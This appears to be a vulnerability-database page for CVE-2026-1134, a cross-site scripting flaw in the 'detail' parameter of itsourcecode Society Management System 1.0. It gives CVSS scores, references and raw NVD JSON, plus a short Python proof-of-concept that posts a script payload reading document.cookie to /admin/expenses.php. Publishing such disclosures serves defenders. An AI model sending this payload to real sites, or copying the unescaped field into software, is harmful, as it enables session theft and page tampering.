CVE-2026-1134

Description

A vulnerability was identified in itsourcecode Society Management System 1.0. This affects an unknown function of the file /admin/expenses.php. The manipulation of the argument detail leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:society_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode Society Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-1134 PoC - itsourcecode Society Management System 1.0 XSS
# Target: /admin/expenses.php
# Parameter: detail

TARGET_URL = "http://target.com/admin/expenses.php"
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"

def exploit_xss(target_url, payload):
    """
    Exploit for CVE-2026-1134
    This PoC demonstrates how to inject XSS payload into the detail parameter
    """
    # Prepare the malicious request
    data = {
        'detail': payload,
        'submit': 'Add Expense'  # Adjust based on actual form parameter
    }
    
    try:
        # Send the malicious request
        response = requests.post(target_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] XSS payload sent successfully to {target_url}")
            print(f"[+] Payload: {payload}")
            print("[*] When admin visits /admin/expenses.php, the alert will be triggered")
            return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = TARGET_URL
    
    exploit_xss(target, XSS_PAYLOAD)

# Note: This PoC requires authentication in most cases
# Adjust authentication headers accordingly
print("Usage: python cve-2026-1134.py <target_url>")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1134
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1134
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1134/
[4] VulDB https://vuldb.com/cve/CVE-2026-1134
[5] https://github.com/TEhS411/cve/issues/7
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.341724
[8] https://vuldb.com/?id.341724
[9] https://vuldb.com/?submit.735156

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1134", "sourceIdentifier": "[email protected]", "published": "2026-01-19T04:15:58.830", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in itsourcecode Society Management System 1.0. This affects an unknown function of the file /admin/expenses.php. The manipulation of the argument detail leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used."}, {"lang": "es", "value": "Se identificó una vulnerabilidad en itsourcecode Society Management System 1.0. Esto afecta una función desconocida del archivo /admin/expenses.php. La manipulación del argumento detail conduce a cross-site scripting. El ataque puede iniciarse de forma remota. El exploit está disponible públicamente y podría ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:society_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "99B926B0-DB28-4E1F-8F49-489C73C35F36"}]}]}], "references": [{"url": "https://github.com/TEhS411/cve/issues/7", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.341724", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341724", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.735156", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}